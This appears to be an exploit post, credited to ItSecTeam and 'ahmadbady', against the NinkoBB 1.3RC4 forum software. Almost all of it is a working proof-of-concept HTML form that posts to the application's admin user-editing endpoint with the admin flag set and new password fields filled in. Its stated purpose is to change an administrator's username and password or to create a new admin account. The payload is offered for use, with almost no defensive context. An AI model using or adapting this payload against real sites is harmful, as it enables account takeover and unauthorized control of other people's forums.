#########################change admin (user,passwd) & add new admin user exploit################ Author: ItSecTeam download from:http://ninkobb.com/releases/?NinkoBB-1.3RC4.zip script:NinkoBB 1.3RC4 update:2010 ----------------------------------------- xpl: <html> <head> <body> <h2>coded by ahmadbady</h2> <td colspan="6" class="title">Admin Control Panel - Editing User</td> </tr> <form name="form" method="post" action="admin.php?a=users&edit=1"> <td class="form"> <dl class="input"> <dt>Username</dt> <dd><input type="text" name="username" class="border" style="width: 40%" value="anything"></dd> <dl class="input"> <dt>Settings<br /><br /> <span></span> <dd><input type="checkbox" name="banned" /> banned</dd> <dd><input type="checkbox" name="moderator" /> moderator</dd> <dd><input type="checkbox" name="admin" checked /> admin</dd> <dl class="input"> <dt>Email</dt> <dd><input type="text" name="email" class="border" style="width: 40%" value=""></dd> <dl class="input"> <dt>New Password</dt> <dd><input type="password" name="npassword" class="border" style="width: 40%"></dd> <dl class="input"> <dt>New Password Again</dt> <dd><input type="password" name="npassworda" class="border" style="width: 40%"></dd> <dl class="input"> <dt>&nbsp;</dt> <dd><input type="submit" class="button" name="edit" value="submit"></dd> </body> </html> ######################## discovered by ahmadbady ########################